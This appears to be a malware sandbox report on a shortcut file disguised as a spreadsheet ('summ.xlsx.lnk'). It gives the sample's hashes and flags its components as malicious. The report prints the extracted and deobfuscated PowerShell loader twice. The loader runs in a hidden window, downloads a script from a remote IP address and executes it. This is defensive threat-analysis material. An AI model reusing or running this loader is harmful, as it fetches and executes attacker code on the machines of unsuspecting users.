Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
90cbc89aa332c6b21906a3e6a6ec1827
Sha1
bbafe87e8ccb4402f88cef55c4da65a4dd5c3d7a
Sha256
19908832f56b96678064ce686c8982e4c46c9a3ef4b489b114843087eec97daa
Sha384
0aa85188fe420e3c158e6fbaed10bf05c2d1323f81641fee508c528b15f8b3de9ed9aa776b527cfc15e00234fd15a18f
Sha512
de02c21a3c60ac37c77ed4dd4d0c2a431cdde934f9bf626b73955af4334a82660e57515426be60e5991d13b9de28ac53f9d02faf7ab22dcd1eecf091d7d90cff
SSDeep
24:9aKk/oKK5JvPJfCii7xoe6rPR5/6snPidNZx8yOyi:9aKEKJHJf4xoe6jR5hPidNZxRM
TLSH
D0E1F02027FB4714F1BA7F3959BB77558C29BE58EE21C78D1520A00E49B0B60EC25B3E
File Structure
90cbc89aa332c6b21906a3e6a6ec1827
Malicious
summ.xlsx.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText))
Deobfuscated PowerShell

-w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://46.161.0.94/mirmLAT/departuredishwasher.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText"))
90cbc89aa332c6b21906a3e6a6ec1827 (7.42 KB)
File Structure
90cbc89aa332c6b21906a3e6a6ec1827
Malicious
summ.xlsx.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText))

Malicious

90cbc89aa332c6b21906a3e6a6ec1827 > summ.xlsx.lnk
Deobfuscated PowerShell

-w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://46.161.0.94/mirmLAT/departuredishwasher.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText"))

Malicious

90cbc89aa332c6b21906a3e6a6ec1827 > summ.xlsx.lnk > LNK CommandLine
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙